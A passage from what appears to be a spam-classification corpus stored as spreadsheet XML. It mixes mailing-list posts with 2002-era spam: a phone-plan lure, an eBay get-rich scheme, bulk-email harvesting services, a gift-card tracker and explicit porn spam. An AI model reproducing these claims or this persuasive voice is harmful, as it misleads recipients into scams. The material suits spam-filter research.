 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Spend Too Much On Your Phone Bill?                 25711
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;!-- saved from url=3D(0053)http://www.glendalestores.com/totalreach/telet=
 ime.htm --&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;So you still don&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;
 &lt;META content=3DFrontPage.Editor.Document name=3DProgId&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;DIV align=3Dcenter&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D2 width=3D600 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%"&gt;
       &lt;P align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3D"Arial Black" size=3D6&gt;Crystal Cle=
 ar Connection With Unlimited 
 	 Long Distance Usage For One Low Flat Rate!&amp;nbsp;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR=
 &gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;DIV align=3Dcenter&gt;
 &lt;CENTER&gt;
 &lt;TABLE cellSpacing=3D1 width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%"&gt;
       &lt;P align=3Dcenter&gt;&lt;FONT face=3D"Arial Black"&gt;&lt;FONT color=3D#cc0000 s=
 ize=3D5&gt;Now 
       try it &lt;/FONT&gt;&lt;FONT size=3D4&gt; for&lt;/FONT&gt;&lt;FONT color=3D#000000&gt; &lt;FONT=
       face=3D"Arial Black" size=3D6&gt;FREE!!*&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT face=3D"Ari=
 al Black" 
       color=3D#cc0000 size=3D6&gt;&amp;nbsp;&lt;/FONT&gt;&lt;BR&gt;&lt;FONT size=3D4&gt;See for 
       yourself.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=3Dcenter&gt;&lt;FONT face=3D"Arial Black" 
   size=3D4&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%"&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#000000 size=3D3&gt;We'l=
 l activate 
       your Flat Rate Unlimited Long Distance Service for 1 week FREE* to p=
 rove 
       that the quality of service&lt;/FONT&gt;&lt;FONT face=3DArial color=3D#0000ff=
       size=3D3&gt; &lt;/FONT&gt;&lt;FONT face=3DArial color=3D#000000 size=3D3&gt;is what=
  you 
       expect.&amp;nbsp;&lt;/FONT&gt;&lt;/B&gt; 
       &lt;P align=3Dcenter&gt;&lt;B&gt;&lt;FONT color=3D#0000ff size=3D5&gt;&lt;FONT 
       face=3D"Arial Black"&gt;Call now! &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT size=3D5&gt;Operator=
 s standing 
       by to activate your service.&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=3D"46%"&gt;
             &lt;P align=3Dcenter&gt;&lt;FONT color=3D#cc0000&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 16pt; mso-bidi-font-size: 12.0pt"&gt;&lt;FONT 
             face=3DArial&gt;&lt;B&gt;Toll Free&lt;/B&gt;&lt;/FONT&gt;:&lt;SPAN 
             style=3D"mso-spacerun: yes"&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 24pt; mso-bidi-font-size: 12.0pt"&gt;&lt;FONT 
             color=3D#cc0000&gt;877-529-7358&lt;/FONT&gt;&lt;BR&gt;&lt;/SPAN&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 16pt; mso-bidi-font-size: 12.0pt; mso-fare=
 ast-font-family: Times New Roman; mso-ansi-language: EN-US; mso-fareast-la=
 nguage: EN-US; mso-bidi-language: AR-SA"&gt;&lt;FONT 
             face=3DArial&gt;Monday through Friday 9am to 9pm 
         EDT&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3DArial&gt;For More Information:&lt;/FONT&gt;=
 &lt;/B&gt;&lt;/P&gt;
       &lt;FORM action=3D"mailto:inbox44@excite.com?subject=3DTeletime Reply" 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=3D"34%"&gt;
             &lt;DIV align=3Dright&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#000000 size=3D=
 2&gt;Your 
             Name:&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;
           &lt;TD width=3D"66%"&gt;&lt;INPUT name=3DNAME&gt; &lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"34%"&gt;
             &lt;DIV align=3Dright&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#000000 
             size=3D2&gt;City:&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;
           &lt;TD width=3D"66%"&gt;&lt;INPUT name=3DCITY coname=3D"COMPANY_NAME"&gt; &lt;/=
 TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"34%"&gt;
             &lt;DIV align=3Dright&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#000000 
             size=3D2&gt;State:&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;
           &lt;TD width=3D"66%"&gt;&lt;INPUT size=3D2 name=3DSTATE&gt; &lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"34%"&gt;
             &lt;DIV align=3Dright&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#000000 size=3D=
 2&gt;Daytime 
             Phone:&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;
           &lt;TD width=3D"66%"&gt;&lt;INPUT name=3DDAY_PHONE&gt; &lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"34%"&gt;
             &lt;DIV align=3Dright&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#000000 size=3D=
 2&gt;Nighttime 
             Phone:&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;
           &lt;TD width=3D"66%"&gt;&lt;INPUT name=3DNITE_PHONE&gt; &lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"34%"&gt;
             &lt;DIV align=3Dright&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#000000 
             size=3D2&gt;Email:&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;
           &lt;TD width=3D"66%"&gt;&lt;INPUT name=3DEMAIL&gt; &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE=
 &gt;
       &lt;DIV align=3Dcenter&gt;
       &lt;P align=3Dcenter&gt;&lt;INPUT type=3Dsubmit value=3D"Submit Information" =
 name=3Dsubmit&gt; 
       &lt;BR&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
       &lt;/P&gt;&lt;/DIV&gt;&lt;/FORM&gt;
       &lt;P&gt;&lt;B&gt;&lt;FONT size=3D5&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=3DArial size=3D2&gt;*One=
  week free 
       offer is valid to those who have a valid checking account. Service i=
 s 
       never billed until after the 1 week free trial 
       period.&amp;nbsp;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=3DArial 
   size=3D3&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT size=3D2&gt;If you have received this by error or wis=
 h to be 
 removed from our mailing list, please &lt;A href=3D"mailto:REM0VE.Y@excite.co=
 m"&gt;click 
 here&lt;/A&gt; &lt;/FONT&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: eBay and Auction Info                30314
</t>
  </si>
  <si>
    <t xml:space="preserve">You are receiving this email because you have expressed an interest=20
 in making money with eBay and or on the Internet.
 =A0
 How would you like to earn $750 a day=20
 using eBay and the Internet?
 =A0
 I absolutely - 100% - Guarantee you have never heard of this eBay=20
 &amp; Internet money-making system before.
 http://www.mailcomesandgoes.com/auction/
 This free ebook is powerful, so compelling it will blow your mind!
 =A0
 Mark W. Monday - The eBay Millionaire
 =A0
 In just a few minutes reading my book, you will find an opportunity=20
 so powerful, so compelling, that you'll wonder why someone hasn't=20
 thought of this sooner!
 =A0
 This is not a multi level marketing program or =93Get rich quick scheme=94=
 =20
 It is a real business that can make you real wealthy.
 http://www.mailcomesandgoes.com/auction/
 =A0
 Imagine yourself waking up in the morning, turning on your computer and=20
 finding out that thousands of dollars had been deposited into your bank=20
 account.  How would that make you feel?  It is 100% possible when you=20
 know the secrets to making money using eBay and the Internet.=20
 =A0
 If this idea turns you on, then so will this new eBook! Respond now and=20
 you will immediately receive via email the entire ebook.
 http://www.mailcomesandgoes.com/auction/
 =A0
 Free Bonus - Respond right now and we=92ll give you the special report -=20
 The 5 Secrets to earning $750 a day using eBay, affiliate programs and=20
 the Internet! =A0
 =A0
 Everything we offered here is free, you have absolutely nothing to lose -=
 =20
 so respond right now and get started.=20
 =A0
 Sincerely,
 =A0
 Mark W. Monday
 The eBay Millionaire
 http://www.mailcomesandgoes.com/auction/
 =A0
 =A0
 You received this email because you have expressed an interest in making=20
 money with eBay and or on the Internet.  You will not receive any more em=
 ails from us.=20
 =A0
 *************************************************************
 If you do not wish to receive any more emails from me, please=20
 visit http://www.deal2002.com/removeme.html and you will be=20
 removed.
 *************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Ireland's hub just moved further away from the internet.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Anyone notice that Esat have started routing most of
 their traffic through Concert...  I've just had my
 first &gt;32hop traceroute since the 1995(ish)
 So much for being at the heart of the Internet !
 --
 Chris Higgins
 Horizon
 e: chris.higgins at hts.horizon.ie
 tel: +353-1-6204900
 fax: +353-1-6204901
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: See your Company sales sky rocket.                 4611
</t>
  </si>
  <si>
    <t xml:space="preserve">There is NO stumbling on to it! 
 The greatest way of marketing this century is undoubtedly direct
 e-mail. It's similar to the postman delivering a letter to your
 mailbox. 
 The ability to promote your product, service, website, or 
 MLM/network marketing opportunity to millions instantly is 
 what advertisers have been dreaming of for over 100 years. 
 We e-mail your one page promotion to a list of our
 general addresses. The greatest part is, it's 
 completely affordable.
 E-MAIL MARKETING IS THE ANSWER! 
 How do we know? 
 We know because that's exactly what we do.
 It's a proven fact that you can attract new business through 
 Direct E-mail Marketing. 
 The profits that E-mail advertising generate are amazing!
 We are living proof. 
 We are a direct E-mail internet advertising company and 
 our clients pay us thousands of dollars a week to E-mail 
 their products and services.  
 We Don't want any one spending thousands on a direct email marketing campane
 with out testing the market to see how it works.
 STANDARD PRICING AND PROCEDURES
 -----------------------------------------------------------------------
 EXTRACTING:
 Our list of general Internet addreses are actually extracted 
 from the most popular web sites on the Internet. The addresses are verified 
 and run through our purification process. The process includes addresses
 run against our custom remove filter of 2,492 keywords, as well as
 through our 192MB remove /flamer list. The EDU, ORG, GOV, MIL, and US
 domains are removed, as well as other domains that asked not to
 receive e-mail.
 -----------------------------------------------------------------------
 EVALUATION:  $350.00 (optional)
 One of our marketing specialists will evaluate your sales letter, and
 offer his/her expertise on how to make it the most successful.
 -----------------------------------------------------------------------
 STANDARD PRICING: (Emails Delivered)
 1 Million- $700.00 per
 2 Million- $600.00 per
 3 Million- $500.00 per
 4 Million &amp; up - $400.00 per
 -----------------------------------------------------------------------
 SPECIAL OFFER!
 This introductory offer of $300.00 includes:
 1. Set-Up Fee
 2. Evaluation of Sales Letter 
 3. 500,000 e-mails delivered
 -----------------------------------------------------------------------
 PAYMENT POLICY:
 All services must be paid in full prior to delivery of advertisement.
 -----------------------------------------------------------------------
 NOTICE: 
 Absolutely no threatening or questionable materials. 
 If you are serious about Direct &gt;&gt;Email&gt;&gt; Marketing&gt;&gt;--Fax 
 the following to (602) 392-8288
 ----------------------------------------------------------------------
 PLEASE FILL THIS FORM OUT COMPLETELY!
 Contact Name: _____________________________________________
 Business Name:  ______________________________________
 # Years in Business:  _________________________
 Business Type:  ______________________________________
 Address: _________________________________________________
 City: ____________________  State: ______  
 Zip: ______________  Country: _______________
 Email Address: _______________________________________________
 Phone:  __________________________ Fax:  _______________________
 &gt;&gt;&gt;&gt;&gt;-&gt;       &lt;&lt; NO Toll-Free Phone #'s &gt;&gt;
 ------------------------------------------
 To get out from our email database send an email to 
 publicservice1@btamail.net.cn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [NYT] Real Source
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 22 Jul 2002, Adam Rifkin wrote:
 --]By JOHN MARKOFF
      Ahhh the ahole reporter we all love to sneer at:)-
 --]SAN FRANCISCO, July 21 -- In a significant challenge to Microsoft,
 --]RealNetworks plans to announce a new version of its software on Monday
 --]that can distribute audio and video in a range of formats, including
 --]Microsoft's own proprietary Windows Media.
 Real is more currupt that MS in so many real ways its astounding Real and
 MS CEOS dont felate each other at tech and mass media conferences.
 Real needs to die and die horribly. Thier biz practices alone give them an
 instant berth in the 5th circle of hell. ALl the crap they foist on
 systems during installation gets em free passes to all the other circles.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: My source: RE: A biblical digression
</t>
  </si>
  <si>
    <t xml:space="preserve">Remember I didn't say it was necessarily a good source, just that it
 looked good.
 The site was http://www.religioustolerance.org/chr_10c7.htm
 My memory of what they said was accurate.  I do not have the competence
 to defend what they said.  James Tauber's response indicates a breadth
 of knowledge I can't match.
 &gt; -----Original Message-----
 &gt; From: James Tauber [mailto:jtauber@jtauber.com]
 &gt; Sent: Sunday, August 25, 2002 9:51 AM
 &gt; To: johnhall@evergo.net; fork@spamassassin.taint.org
 &gt; Subject: Re: A biblical digression
 &gt; 
 &gt; On Sat, 24 Aug 2002 11:07:00 -0700, "John Hall" &lt;johnhall@evergo.net&gt;
 &gt; said:
 &gt; &gt; Ran across a site which claimed to explain the original meaning of
 the
 &gt; &gt; Ten Commandments.  It seems some of those meanings have evolved a
 bit,
 &gt; &gt; too.
 &gt; 
 &gt; By "meanings have evolved" do you [or they] mean that the Hebrew words
 &gt; have changed meaning or that our understanding of the Hebrew words
 have
 &gt; changed? Or do they posit a pre-Mosaic form of the laws that had
 &gt; evolved by time of the Pentateuch?
 &gt; 
 &gt; &gt; In particular, there was a claim that the commandment on stealing
 was
 &gt; &gt; actually specifically about 'man stealing -- selling a free man into
 &gt; &gt; slavery.
 &gt; 
 &gt; This seems bogus to me. A quick check of the text indicates the the
 &gt; Hebrew word in question is GANAV which elsewhere in the Pentateuch (eg
 &gt; Gen 44.8) is used to mean steal silver and gold amongst other things.
 &gt; 
 &gt; In July 1999, I made the following comment in response to a similar
 &gt; claim about the "real" meaning of one of the ten commandments:
 &gt; 
 &gt; """
 &gt; &gt; The translations since cause problems at each successive remove
 &gt; 
 &gt; We have the original language versions, though, so this is not an
 &gt; issue.
 &gt; 
 &gt; &gt; I'm sure most everyone is familiar with the argument that the
 meaning of
 &gt; the commandment
 &gt; &gt; is 'thou shalt not murder' rather than 'kill,'
 &gt; 
 &gt; This has nothing to do with successive translations. It is based on
 our
 &gt; knowledge of the meaning of the Hebrew word "ratsach". Most modern
 &gt; translations I've seen translate it "murder" but elsewhere the word is
 &gt; used
 &gt; of an animal killing a human (something for which most English
 speakers
 &gt; wouldn't use the word "murder").
 &gt; """
 &gt; - http://www.xent.com/FoRK-archive/july99/0163.html
 &gt; 
 &gt; 
 &gt; 
 &gt; James
 &gt; --
 &gt;   James Tauber
 &gt;   jtauber@jtauber.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_31119591P
 Content-Type: text/plain; charset=us-ascii
 On Wed, 21 Aug 2002 15:01:07 +0700, Robert Elz said:
 &gt; Hmm - I've been using MH for a long time (since well before there were
 &gt; sequences) and I don't think I've ever seen a "pseq" ...
 My bad - I had 'Previous-Sequence: pseq' in my .mh_profile from long ago and
 far away.
 -- 
 				Valdis Kletnieks
 				Computer Systems Senior Engineer
 				Virginia Tech
 --==_Exmh_31119591P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 Comment: Exmh version 2.5 07/13/2001
 iD8DBQE9Y7AzcC3lWbTT17ARAp/tAJ4gYhfoiqyVwy6CpYSsxdmq5//o5gCfWOy/
 7yBnBY65rPE7W6UWhH5aKc4=
 =RD0t
 -----END PGP SIGNATURE-----
 --==_Exmh_31119591P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Claim a Free $25 Kmart(R) Gift Card!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;EM049&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor="#FFFFFF" leftMargin="0" topMargin="0" MARGINHEIGHT="0" MARGINWIDTH="0"&gt;
 &lt;table width="550" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=FWOATHSKUDMM&amp;ext=1"&gt;
 	&lt;IMG src="http://admanmail.com/ads/adman/kmart/EM049_01.gif" alt="" border="0" height="59" width="550"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=FWOATHSKUDMM&amp;ext=1"&gt;
 	&lt;IMG src="http://admanmail.com/ads/adman/kmart//EM049_02.gif" alt="" border="0" height="83" width="336"&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=FWOATHSKUDMM&amp;ext=1"&gt;
 	&lt;IMG src="http://admanmail.com/ads/adman/kmart//EM049_03.gif" alt="" border=0 height=83 width=214&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=FWOATHSKUDMM&amp;ext=1"&gt;
 	&lt;IMG src="http://admanmail.com/ads/adman/kmart//EM049_04.gif" alt="" border="0" height="39" width="336"&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD rowSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=FWOATHSKUDMM&amp;ext=1"&gt;
 	&lt;IMG src="http://admanmail.com/ads/adman/kmart//EM049_05.gif" alt="" border="0" height="134" width="214"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=FWOATHSKUDMM&amp;ext=1"&gt;
 	&lt;IMG src="http://admanmail.com/ads/adman/kmart//EM049_06.gif" alt="" border="0" height="95" width="336"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD rowSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=FWOATHSKUDMM&amp;ext=1"&gt;
 	&lt;IMG src="http://admanmail.com/ads/adman/kmart//EM049_07.gif" alt="" border=0 height=237 width=336&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=FWOATHSKUDMM&amp;ext=1"&gt;
 	&lt;IMG src="http://admanmail.com/ads/adman/kmart//EM049_08.gif" alt="" border="0" height="176" width="214"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=FWOATHSKUDMM&amp;ext=1"&gt;
 	&lt;IMG src="http://admanmail.com/ads/adman/kmart//EM049_09.gif" alt="" border="0" height="61" width="214"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=FWOATHSKUDMM&amp;ext=1"&gt;
 	&lt;IMG src="http://admanmail.com/ads/adman/kmart//EM049_10.gif" alt="" border="0" height="14" width="550"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;br&gt;
 	&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=FWOATHSKUDMM"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</si>
  <si>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Latina Teens!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;See These Sweet Latina Honeys Go From Clothed TO Fucked!!!&lt;br&gt;
 Too Good To Be True?&lt;br&gt;
 Not A Chance... Our Girls Love To Fuck Live....&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;font size="5"&gt;&lt;a href="http://2f.free3host.net/site5/"&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font size="2"&gt;YOU MUST BE AT LEAST 18 TO ENTER!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;=============================================================&lt;br&gt;
 To be removed from our "in house" mailing list &lt;a href="http://2f.free3host.net/site5/takemeoff.html"&gt;CLICK HERE&lt;/a&gt;&lt;br&gt;
 and you will automatically be removed from future mailings.&lt;br&gt;
 &lt;br&gt;
 You have received this email by either requesting more information&lt;br&gt;
 on one of our sites or someone may have used your email address.&lt;br&gt;
 If you received this email in error, please accept our apologies.&lt;br&gt;
 =============================================================&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Take Action Immediately or Miss Out.
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --__________MIMEboundary__________
 Content-Type: text/plain
 Content-Transfer-Encoding: 7bit
 That's right! For a limited time, you are
 eligible to receive up to 4, yes four, Satellite TV
 receivers at absolutely NO COST from EliteDish
 As an added bonus, your first 3 months of Service
 will be free.  3 months..... Just think about what
 you could do with that extra money......
 You must act now! Click Here to Apply: 
 http://r.vresp.com/?A/41dd308805
 or call us 1-800-823-2466
 Sign up today and receive FREE Installation and guess what?
 Your first 3 months of programming are paid! Equipment,
 Installation and Programming at NO COST to you! Drop Cable
 go for Digital Entertainment.  If your paying for cable, 
 your paying too much.  Want proof? Look at what you will 
 receive with our Satellite package. 
 Here is what you qualify for:
 -FREE complete Satellite TV System (up to 4 rooms)  
 -FREE Professional Installation (anywhere in the USA)  
 -FREE 3 Months of Programming at no cost.  
 -FREE In Home Service Plan  
 -Over 170 channels to watch and hundreds of Pay-Per-View
 movies.  
 That's it! No hidden Charges. 100% Satisfaction Guarantee.
 Click Here to Apply:
 http://r.vresp.com/?A/1403f3d891
 ______________________________________________________________________
 You have signed up with one of our network partners to receive email
 providing you with special offers that may appeal to you. If you do not
 wish to receive these offers in the future, reply to this email with
 "unsubscribe" in the subject or simply click on the following link:
 http://unsubscribe.verticalresponse.com/u.html?ab749eca98/aa3b97bcc2
 --__________MIMEboundary__________
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt; &lt;HEAD&gt; &lt;TITLE&gt;Claim Your FREE Satellite TV System&lt;/TITLE&gt; &lt;META
 HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt; &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#FFFFFF leftmargin="0" marginwidth="0" topmargin="0"
 marginheight="0" onUnload="this.focus()"&gt; &lt;div align="center"&gt;    &lt;TABLE
 width="641" BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;     &lt;TR&gt;      &lt;TD&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=102
 HEIGHT=1&gt;&lt;/TD&gt;      &lt;TD width="229"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=229
 HEIGHT=1&gt;&lt;/TD&gt;      &lt;TD width="31"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=31
 HEIGHT=1&gt;&lt;/TD&gt;      &lt;TD width="177"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=177
 HEIGHT=1&gt;&lt;/TD&gt;      &lt;TD&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=101
 HEIGHT=1&gt;&lt;/TD&gt;      &lt;TD&gt;&lt;/TD&gt;     &lt;/TR&gt;     &lt;TR&gt;             &lt;TD
 ROWSPAN=9&gt;&lt;a href="http://r.vresp.com/?A/7e86b0b62f"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/Blue-Cert_left.gif" WIDTH=102
 HEIGHT=655 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;       &lt;TD COLSPAN=3 width="437"&gt;&lt;a
 href="http://r.vresp.com/?A/9720647819"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/Blue-Cert_top.gif" WIDTH=437
 HEIGHT=120 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;             &lt;TD ROWSPAN=9&gt;&lt;a
 href="http://r.vresp.com/?A/638bbf2803"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/Blue-Cert_right.gif" WIDTH=101
 HEIGHT=655 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;      &lt;TD&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=1
 HEIGHT=120&gt;&lt;/TD&gt;     &lt;/TR&gt;     &lt;TR&gt;      &lt;TD rowspan="2" COLSPAN=3
 width="437"&gt;&lt;a href="http://r.vresp.com/?A/be0f2b4499"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/Blue-Cert_approved.gif" WIDTH=437
 HEIGHT=86 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;      &lt;TD&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=1
 HEIGHT=54&gt;&lt;/TD&gt;     &lt;/TR&gt;     &lt;TR&gt;      &lt;TD&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=1
 HEIGHT=32&gt;&lt;/TD&gt;     &lt;/TR&gt;     &lt;TR height="82"&gt;             &lt;TD height="82"
 width="229"&gt;&lt;a href="http://r.vresp.com/?A/4592ce854d"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/Blue-Cert_policy.gif" WIDTH=229
 HEIGHT=82 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;      &lt;TD COLSPAN=2 width="208" height="82"
 background="http://64.227.172.50/655410/images/Blue-Cert_waves01.gif"
